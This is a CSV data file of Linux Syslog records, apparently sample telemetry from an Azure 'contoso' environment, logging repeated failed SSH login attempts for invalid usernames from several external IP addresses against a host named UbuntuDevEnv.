+16246,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:56:41,UbuntuDevEnv,2019-06-26 06:56:41,auth,UbuntuDevEnv,info,Invalid user echoice-dev from 138.68.29.52 port 34218,36291,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,echoice,138.68.29.5,34218,,
+16247,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:56:41,UbuntuDevEnv,2019-06-26 06:56:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.29.52,36291,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.29.5,,0,
+16248,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:56:41,UbuntuDevEnv,2019-06-26 06:56:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36291,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16249,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:56:44,UbuntuDevEnv,2019-06-26 06:56:43,auth,UbuntuDevEnv,info,Failed password for invalid user echoice-dev from 138.68.29.52 port 34218 ssh2,36291,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,echoice,138.68.29.5,34218,,
+16250,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:56:44,UbuntuDevEnv,2019-06-26 06:56:43,auth,UbuntuDevEnv,info,Received disconnect from 138.68.29.52 port 34218:11: Bye Bye [preauth],36291,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.29.5,34218,,
+16251,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:56:44,UbuntuDevEnv,2019-06-26 06:56:43,auth,UbuntuDevEnv,info,Disconnected from invalid user echoice-dev 138.68.29.52 port 34218 [preauth],36291,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,echoice,138.68.29.5,34218,,
+16252,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:57:01,UbuntuDevEnv,2019-06-26 06:57:00,auth,UbuntuDevEnv,info,Invalid user pil from 64.202.187.152 port 40154,36361,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pil,64.202.187.1,40154,,
+16253,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:57:01,UbuntuDevEnv,2019-06-26 06:57:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36361,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16254,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:57:01,UbuntuDevEnv,2019-06-26 06:57:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=64.202.187.152,36361,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,64.202.187.1,,0,
+16255,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:57:03,UbuntuDevEnv,2019-06-26 06:57:03,auth,UbuntuDevEnv,info,Failed password for invalid user pil from 64.202.187.152 port 40154 ssh2,36361,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pil,64.202.187.1,40154,,
+16256,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:57:03,UbuntuDevEnv,2019-06-26 06:57:03,auth,UbuntuDevEnv,info,Disconnected from invalid user pil 64.202.187.152 port 40154 [preauth],36361,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pil,64.202.187.1,40154,,
+16257,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:57:03,UbuntuDevEnv,2019-06-26 06:57:03,auth,UbuntuDevEnv,info,Received disconnect from 64.202.187.152 port 40154:11: Bye Bye [preauth],36361,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,64.202.187.1,40154,,
+16258,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:57:32,UbuntuDevEnv,2019-06-26 06:57:32,auth,UbuntuDevEnv,info,Invalid user dev from 87.101.240.10 port 33376,36470,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dev,87.101.240.1,33376,,
+16259,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:57:32,UbuntuDevEnv,2019-06-26 06:57:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36470,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16260,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:57:32,UbuntuDevEnv,2019-06-26 06:57:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=87.101.240.10,36470,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,87.101.240.1,,0,
+16261,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:59:58,UbuntuDevEnv,2019-06-26 06:59:58,auth,UbuntuDevEnv,info,Invalid user hotel from 64.202.187.152 port 46790,37003,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hotel,64.202.187.1,46790,,
+16262,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:59:58,UbuntuDevEnv,2019-06-26 06:59:58,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,37003,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16263,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:59:58,UbuntuDevEnv,2019-06-26 06:59:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=64.202.187.152,37003,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,64.202.187.1,,0,
+16264,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:59:59,UbuntuDevEnv,2019-06-26 06:59:58,auth,UbuntuDevEnv,info,Invalid user anjana from 206.189.118.156 port 35856,37006,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anjana,206.189.118.1,35856,,
+16265,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:59:59,UbuntuDevEnv,2019-06-26 06:59:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=206.189.118.156,37006,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,206.189.118.1,,0,
+16266,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:59:59,UbuntuDevEnv,2019-06-26 06:59:58,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,37006,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16267,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:00:00,UbuntuDevEnv,2019-06-26 07:00:00,auth,UbuntuDevEnv,info,Failed password for invalid user hotel from 64.202.187.152 port 46790 ssh2,37003,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hotel,64.202.187.1,46790,,
+16268,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:00:00,UbuntuDevEnv,2019-06-26 07:00:00,auth,UbuntuDevEnv,info,Disconnected from invalid user hotel 64.202.187.152 port 46790 [preauth],37003,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hotel,64.202.187.1,46790,,
+16269,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:00:00,UbuntuDevEnv,2019-06-26 07:00:00,auth,UbuntuDevEnv,info,Received disconnect from 64.202.187.152 port 46790:11: Bye Bye [preauth],37003,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,64.202.187.1,46790,,
+16270,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:00:00,UbuntuDevEnv,2019-06-26 07:00:00,auth,UbuntuDevEnv,info,Failed password for invalid user anjana from 206.189.118.156 port 35856 ssh2,37006,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anjana,206.189.118.1,35856,,
+16271,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:00:01,UbuntuDevEnv,2019-06-26 07:00:00,auth,UbuntuDevEnv,info,Disconnected from invalid user anjana 206.189.118.156 port 35856 [preauth],37006,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anjana,206.189.118.1,35856,,
+16272,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:00:01,UbuntuDevEnv,2019-06-26 07:00:00,auth,UbuntuDevEnv,info,Received disconnect from 206.189.118.156 port 35856:11: Bye Bye [preauth],37006,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,206.189.118.1,35856,,
+16273,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:01:05,UbuntuDevEnv,2019-06-26 07:01:05,auth,UbuntuDevEnv,info,Invalid user jason from 138.68.29.52 port 57942,37326,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jason,138.68.29.5,57942,,
+16274,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:01:05,UbuntuDevEnv,2019-06-26 07:01:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,37326,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16275,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:01:05,UbuntuDevEnv,2019-06-26 07:01:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.29.52,37326,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.29.5,,0,
+16276,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:01:08,UbuntuDevEnv,2019-06-26 07:01:07,auth,UbuntuDevEnv,info,Failed password for invalid user jason from 138.68.29.52 port 57942 ssh2,37326,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jason,138.68.29.5,57942,,
+16277,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:01:08,UbuntuDevEnv,2019-06-26 07:01:07,auth,UbuntuDevEnv,info,Received disconnect from 138.68.29.52 port 57942:11: Bye Bye [preauth],37326,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.29.5,57942,,
+16278,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:01:08,UbuntuDevEnv,2019-06-26 07:01:07,auth,UbuntuDevEnv,info,Disconnected from invalid user jason 138.68.29.52 port 57942 [preauth],37326,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jason,138.68.29.5,57942,,
+16279,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:01:27,UbuntuDevEnv,2019-06-26 07:01:26,auth,UbuntuDevEnv,info,Invalid user qo from 64.202.187.152 port 35992,37407,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qo,64.202.187.1,35992,,
+16280,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:01:27,UbuntuDevEnv,2019-06-26 07:01:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=64.202.187.152,37407,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,64.202.187.1,,0,
+16281,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:01:27,UbuntuDevEnv,2019-06-26 07:01:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,37407,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16282,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:01:29,UbuntuDevEnv,2019-06-26 07:01:28,auth,UbuntuDevEnv,info,Failed password for invalid user qo from 64.202.187.152 port 35992 ssh2,37407,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qo,64.202.187.1,35992,,
+16283,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:01:29,UbuntuDevEnv,2019-06-26 07:01:28,auth,UbuntuDevEnv,info,Received disconnect from 64.202.187.152 port 35992:11: Bye Bye [preauth],37407,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,64.202.187.1,35992,,
+16284,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:01:29,UbuntuDevEnv,2019-06-26 07:01:28,auth,UbuntuDevEnv,info,Disconnected from invalid user qo 64.202.187.152 port 35992 [preauth],37407,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qo,64.202.187.1,35992,,
+16285,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:01:31,UbuntuDevEnv,2019-06-26 07:01:31,auth,UbuntuDevEnv,info,Invalid user mosquitto from 87.101.240.10 port 39650,37420,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mosquitto,87.101.240.1,39650,,
+16286,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:01:31,UbuntuDevEnv,2019-06-26 07:01:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=87.101.240.10,37420,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,87.101.240.1,,0,
+16287,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:01:31,UbuntuDevEnv,2019-06-26 07:01:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,37420,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16288,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:01:33,UbuntuDevEnv,2019-06-26 07:01:32,auth,UbuntuDevEnv,info,Failed password for invalid user mosquitto from 87.101.240.10 port 39650 ssh2,37420,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mosquitto,87.101.240.1,39650,,
+16289,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:01:33,UbuntuDevEnv,2019-06-26 07:01:33,auth,UbuntuDevEnv,info,Received disconnect from 87.101.240.10 port 39650:11: Bye Bye [preauth],37420,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,87.101.240.1,39650,,
+16290,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:01:33,UbuntuDevEnv,2019-06-26 07:01:33,auth,UbuntuDevEnv,info,Disconnected from invalid user mosquitto 87.101.240.10 port 39650 [preauth],37420,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mosquitto,87.101.240.1,39650,,
+16291,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:01:52,UbuntuDevEnv,2019-06-26 07:01:52,auth,UbuntuDevEnv,info,Invalid user odile from 46.101.149.230 port 60542,37490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,odile,46.101.149.2,60542,,
+16292,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:01:52,UbuntuDevEnv,2019-06-26 07:01:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,37490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16293,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:01:52,UbuntuDevEnv,2019-06-26 07:01:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=46.101.149.230,37490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,46.101.149.2,,0,
+16294,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:01:55,UbuntuDevEnv,2019-06-26 07:01:54,auth,UbuntuDevEnv,info,Failed password for invalid user odile from 46.101.149.230 port 60542 ssh2,37490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,odile,46.101.149.2,60542,,
+16295,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:01:55,UbuntuDevEnv,2019-06-26 07:01:54,auth,UbuntuDevEnv,info,Disconnected from invalid user odile 46.101.149.230 port 60542 [preauth],37490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,odile,46.101.149.2,60542,,
+16296,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:01:55,UbuntuDevEnv,2019-06-26 07:01:54,auth,UbuntuDevEnv,info,Received disconnect from 46.101.149.230 port 60542:11: Bye Bye [preauth],37490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,46.101.149.2,60542,,
+16297,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:02:31,UbuntuDevEnv,2019-06-26 07:02:30,auth,UbuntuDevEnv,info,Invalid user vps from 206.189.118.156 port 36436,37640,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vps,206.189.118.1,36436,,
+16298,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:02:31,UbuntuDevEnv,2019-06-26 07:02:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=206.189.118.156,37640,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,206.189.118.1,,0,
+16299,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:02:31,UbuntuDevEnv,2019-06-26 07:02:30,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,37640,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16300,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:02:33,UbuntuDevEnv,2019-06-26 07:02:32,auth,UbuntuDevEnv,info,Failed password for invalid user vps from 206.189.118.156 port 36436 ssh2,37640,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vps,206.189.118.1,36436,,
+16301,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:02:33,UbuntuDevEnv,2019-06-26 07:02:32,auth,UbuntuDevEnv,info,Received disconnect from 206.189.118.156 port 36436:11: Bye Bye [preauth],37640,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,206.189.118.1,36436,,
+16302,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:02:33,UbuntuDevEnv,2019-06-26 07:02:32,auth,UbuntuDevEnv,info,Disconnected from invalid user vps 206.189.118.156 port 36436 [preauth],37640,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vps,206.189.118.1,36436,,
+16303,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:02:38,UbuntuDevEnv,2019-06-26 07:02:37,auth,UbuntuDevEnv,info,Invalid user ireneusz from 138.68.29.52 port 47032,37661,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ireneusz,138.68.29.5,47032,,
+16304,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:02:38,UbuntuDevEnv,2019-06-26 07:02:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,37661,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16305,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:02:38,UbuntuDevEnv,2019-06-26 07:02:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.29.52,37661,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.29.5,,0,
